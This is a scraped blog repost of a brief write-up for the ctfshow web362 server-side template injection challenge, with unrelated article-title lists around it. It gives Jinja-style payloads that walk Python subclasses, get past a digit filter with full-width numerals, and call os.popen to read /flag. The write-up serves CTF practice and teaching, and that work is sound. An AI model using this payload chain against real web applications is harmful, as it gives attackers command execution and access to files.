当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到這一步都是正常的
從12開始就沒用了
數字出現了問題,看wp用全角數字代替正常數字繞過
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然後應該可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- Daily CISSP certification common mistakes (April 12, 2022)
- 硬核解析Promise对象(这七个必会的常用API和七个关键问题你都了解吗?)
- Const keyword, variable and function are decorated with const
- Win1远程出现“这可能是由于credssp加密oracle修正”解决办法
- Stm32mp157 wm8960 audio driver debugging notes
- 昇腾 AI 开发者创享日全国巡回首站在西安成功举行
- Realization of consumer gray scale
- Box pointer of rust
- Gst-launch-1.0 usage notes
- Daily network security certification test questions (April 18, 2022)
猜你喜欢
Use bitnami / PostgreSQL repmgr image to quickly set up PostgreSQL ha
多功能工具箱微信小程序源码
函数递归以及趣味问题的解决
昇腾 AI 开发者创享日全国巡回首站在西安成功举行
机器学习实战 -朴素贝叶斯
Robocode Tutorial 4 - robocode's game physics
powerdesigner各种字体设置;preview字体设置;sql字体设置
From introduction to mastery of MATLAB (2)
Robocode tutorial 3 - Robo machine analysis
STM32 learning record 0008 - GPIO things 1
随机推荐
Rust: shared variable in thread pool
Differences between SSD hard disk SATA interface and m.2 interface (detailed summary)
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
Domestic GD chip can filter
CISSP certified daily knowledge points (April 14, 2022)
The difference between deep copy and shallow copy
Daily network security certification test questions (April 12, 2022)
Introduction to quantexa CDI syneo platform
Serialization scheme of serde - trust
powerdesigner各种字体设置;preview字体设置;sql字体设置
Robocode tutorial 5 - enemy class
Use stm32cube MX / stm32cube ide to generate FatFs code and operate SPI flash
软件测试总结
CISSP certified daily knowledge points (April 15, 2022)
Stm32mp157 wm8960 audio driver debugging notes
Daily network security certification test questions (April 14, 2022)
K210串口通信
How to restore MySQL database after win10 system is reinstalled (mysql-8.0.26-winx64. Zip)
Setting up keil environment of GD single chip microcomputer
ESP32 LVGL8. 1 - label (style 14)